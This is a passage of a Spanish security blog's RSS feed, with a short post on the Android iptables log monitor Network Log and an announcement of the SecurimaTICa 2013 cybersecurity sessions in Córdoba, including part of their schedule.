Es una aplicación que se encarga de monitorizar en tiempo-real el registros (logs) de las conexiones de datos generado por el módulo iptables en el dispositivo&amp;nbsp;móvil&amp;nbsp;con Android.&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
La aplicación organiza la información en tablas y gráficos para que sea sencillo analizar la información disponible.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://lh5.ggpht.com/1bjGVQybQQDOS4mYm0BF2PWX1085TQqg2p6m_QuILtrErrKT-I5QezLrCUmlJmk7xg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://lh5.ggpht.com/1bjGVQybQQDOS4mYm0BF2PWX1085TQqg2p6m_QuILtrErrKT-I5QezLrCUmlJmk7xg" width="225" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq" style="text-align: justify;"&gt;
&lt;i&gt;&lt;b&gt;Iptables&lt;/b&gt;: se encuentra&amp;nbsp;disponible en el núcleo (kernel) Linux (también&amp;nbsp;en el kernel de Android) &amp;nbsp;que permite interceptar y manipular paquetes de red. Dicho módulo permite realizar el manejo de paquetes en diferentes estados del procesamiento, por ejemplo: realizar funciones de cortafuegos (filtrar), registrar el tráfico de la red, o incluso implementar el servicio de traducción de direcciones (NAT).&lt;/i&gt;&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
Además, la aplicación muestra&amp;nbsp;estadísticas&amp;nbsp;del uso de la conexión a Internet, muy&amp;nbsp;útil&amp;nbsp;para controlar el gasto de datos, sobre todo cuando no se dispone de tarifa plana.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b style="font-size: x-large;"&gt;Requisitos&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Para utilizar la herramienta se necesita acceso &lt;b&gt;"root"&lt;/b&gt; al dispositivo. Por lo que es necesario realizar un jailbreak de nuestro sistema Android.&amp;nbsp;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Donwload:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Puede descargar en &lt;a href="https://play.google.com/store/apps/details?id=com.googlecode.networklog#?t=W251bGwsMSwxLDIxMiwiY29tLmdvb2dsZWNvZGUubmV0d29ya2xvZyJd" target="_blank"&gt;Google Play&lt;/a&gt;, o acceder al código fuente en :&amp;nbsp;&lt;a href="https://github.com/pragma-/networklog"&gt;https://github.com/pragma-/networklog&lt;/a&gt;&lt;span style="background-color: white; color: #666666; font-family: Roboto, Arial, sans-serif; font-size: 13px; line-height: 19.5px;"&gt;.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=MAgEbFN28r0:sz6khi0p024:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=MAgEbFN28r0:sz6khi0p024:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=MAgEbFN28r0:sz6khi0p024:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=MAgEbFN28r0:sz6khi0p024:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=MAgEbFN28r0:sz6khi0p024:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=MAgEbFN28r0:sz6khi0p024:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=MAgEbFN28r0:sz6khi0p024:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=MAgEbFN28r0:sz6khi0p024:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=MAgEbFN28r0:sz6khi0p024:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=MAgEbFN28r0:sz6khi0p024:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/MAgEbFN28r0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/MAgEbFN28r0/tools-network-log-analizador-en-tiempo.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-2sNJZAXsl70/UYjMf16uO3I/AAAAAAAAEhQ/GJdl98RgFAk/s72-c/Network_Logs.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/05/tools-network-log-analizador-en-tiempo.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-1733837784183088887</guid><pubDate>Wed, 24 Apr 2013 14:10:00 +0000</pubDate><atom:updated>2013-04-24T16:10:26.599+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Taller</category><category domain="http://www.blogger.com/atom/ns#">Formación</category><category domain="http://www.blogger.com/atom/ns#">Ciberseguridad</category><category domain="http://www.blogger.com/atom/ns#">Eventos</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">Córdoba</category><category domain="http://www.blogger.com/atom/ns#">SecurimaTICa</category><category domain="http://www.blogger.com/atom/ns#">Jornadas</category><title>SecurimaTICa 2013 - Jornadas de #Ciberseguridad en Córdoba</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-CCrUE6z8kYU/UXfeb9ew-3I/AAAAAAAAEdQ/XKpcaKr64L4/s1600/SecurimaTICa_Cordoba_Post_Head.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-CCrUE6z8kYU/UXfeb9ew-3I/AAAAAAAAEdQ/XKpcaKr64L4/s1600/SecurimaTICa_Cordoba_Post_Head.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 17.5px;"&gt;La &lt;a href="http://www.dipucordoba.es/#/contenidos/26793/la_diputacion_impulsa_securimatica_para_contribuir_a_implantar_la_cultura_de_la_ciberseguridad" target="_blank"&gt;Diputación de Córdoba&lt;/a&gt;, a través del Consorcio Provincial de Desarrollo Económico y en el marco del plan Creática, &lt;b&gt;impulsa “Securimática”&lt;/b&gt;, un programa que incluye sesiones informativas, jornadas técnicas y un reto de hacking ético y que trata de contribuir a implantar la cultura de la ciberseguridad entre empresarios y usuarios.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 17.5px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En esta línea, y en colaboración con entidades y empresas especializadas en la seguridad informática se enmarca la celebración de SecurimaTICa´2013. Este programa se compone de una serie de actividades que pretenden contribuir a la implantación de la Cultura de la Ciberseguridad:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;8/05/2013.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Seminario Ciberseguridad "Doméstica".&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;9/05/2013.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Seminario Ciberseguridad en la Empresa.&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;08/05/13-14/05/13.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Reto Hacking Ético.&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;15/05/2013.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Jornada Técnica I.&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;16/05/2013.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Jornada Técnica II.&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;16/05/2013.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Hack &amp;amp; Beers.&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-jkCg3GNSq6E/TmS16mBsxLI/AAAAAAAABP4/BGzvkGrXDyM/s1600/importante_125x_2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-jkCg3GNSq6E/TmS16mBsxLI/AAAAAAAABP4/BGzvkGrXDyM/s1600/importante_125x_2.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Me complace anunciar que estaré en SecurimaTICa 2013&lt;/b&gt;, en las jornadas técnicas del 15 y 16 de Mayo donde impartiré una charla sobre "Seguridad en la Empresa: La amenaza de los smartphones", abordando la tendencia de BYOD (Bring Your Own Device), las amenazas y vulnerabilidades en los dispositivos móviles, así como algunas recomendaciones de seguridad para mitigar los riesgos.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Y por la tarde, toca el &lt;b&gt;taller de Metasploit: Pivoting&lt;/b&gt; .... no os lo&amp;nbsp;perdáis! A&amp;nbsp;continuación&amp;nbsp;os dejo el programa, localización, agenda, y cartel de las jornadas. #Cordobasemueve&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b style="font-family: Arial, Verdana, Tahoma, sans-serif; line-height: 17.5px;"&gt;&lt;span style="font-size: large;"&gt;Programa&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 17.5px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 17.5px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: orange;"&gt;&lt;span style="font-family: Arial, Verdana, Tahoma, sans-serif; line-height: 17.5px;"&gt;&lt;b&gt;&lt;span style="color: white;"&gt;Sesiones&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-family: Arial, Verdana, Tahoma, sans-serif;"&gt;&lt;span style="line-height: 17.5px;"&gt;&lt;b&gt;&lt;span style="color: white;"&gt;Informativas&lt;/span&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 17.5px;"&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; line-height: 17.5px;"&gt;&lt;u&gt;&lt;span style="font-size: large;"&gt;Ciberseguridad en el entorno "doméstico"&lt;/span&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;Fecha: &lt;b&gt;8/05/2013&lt;/b&gt;&lt;br /&gt;Sala de Usos Múltiples. Diputación&lt;br /&gt;Organiza: Diputación/Eprinsa&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;17:00-17:15.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Apertura de la sesión.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Diputación.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;17:15-18:00.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Seguridad y privacidad en redes sociales.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Policía.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;18:00-18:45.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;¿Nuestra WiFi en segura?&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Raul Morales / Antonio Osuna (Aconsa).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;18:45-19:30.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;¿Estás seguro de que estás seguro?&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Miguel Ángel (Aconsa).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;19:30-20:15.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Hacer de nuestra afición nuestra profesión.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Pedro Reina (Infinito).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;20:15-20:30.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Cierre de la sesión.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Diputación.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;u&gt;&lt;span style="font-size: large;"&gt;Ciberseguridad en la Empresa&lt;/span&gt;&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;Fecha: &lt;b&gt;9/05/2013&lt;/b&gt;&lt;br /&gt;Sala de Usos Múltiples. Diputación&lt;br /&gt;Organiza: Diputación/Eprinsa&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;17:00-17:15.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Apertura de la sesión.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Diputación.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;17:15-18:00.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;¿Cómo actuar ante un ataque?&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Policía.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;18:00-18:45.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Aspectos legales en el mundo digital&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Francisco Ramírez (Avanza).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;18:45-19:30.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Amenazas y riesgos para nuestra empresa.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Miguel Ángel (Aconsa).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;19:30-20:15.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Comunicación segura con la Administración.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Eprinsa.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;20:15-20:30.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Cierre de la sesión.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Diputación.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="background-color: orange; font-family: Arial, Verdana, Tahoma, sans-serif; line-height: 17.5px;"&gt;&lt;b&gt;&lt;span style="color: white;"&gt;Jornadas Técnicas &lt;/span&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; font-size: 14px; line-height: 17.5px;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="background-color: white; font-family: Arial, Verdana, Tahoma, sans-serif; line-height: 17.5px;"&gt;&lt;u&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;Jornada I&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;Fecha: &lt;b&gt;15/05/2013&lt;/b&gt;&lt;br /&gt;Diputación&lt;br /&gt;Organiza: Diputación/Eprinsa&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;9:30-09:45.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Presentación Institucional.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Diputación.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;9:45-10:30.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Delitos telemáticos en nuestra sociedad.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Policía.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;10:30-11:15.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Lo esencial y lo crítico, de la gran empresa al usuario.&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Joaquín González (Grupo Control).&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;11:45-12:15.&amp;nbsp;&lt;/span&gt;&lt;b style="-webkit-text-size-adjust: none; border: 0px; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: top;"&gt;Obligaciones legales con la Administración (LOPD).&lt;/b&gt;&lt;span style="-webkit-text-size-adjust: none; background-color: white; color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;"&gt;&amp;nbsp;Francisco Ramírez (Avanza).&lt;/span&gt;&lt;/li&gt;
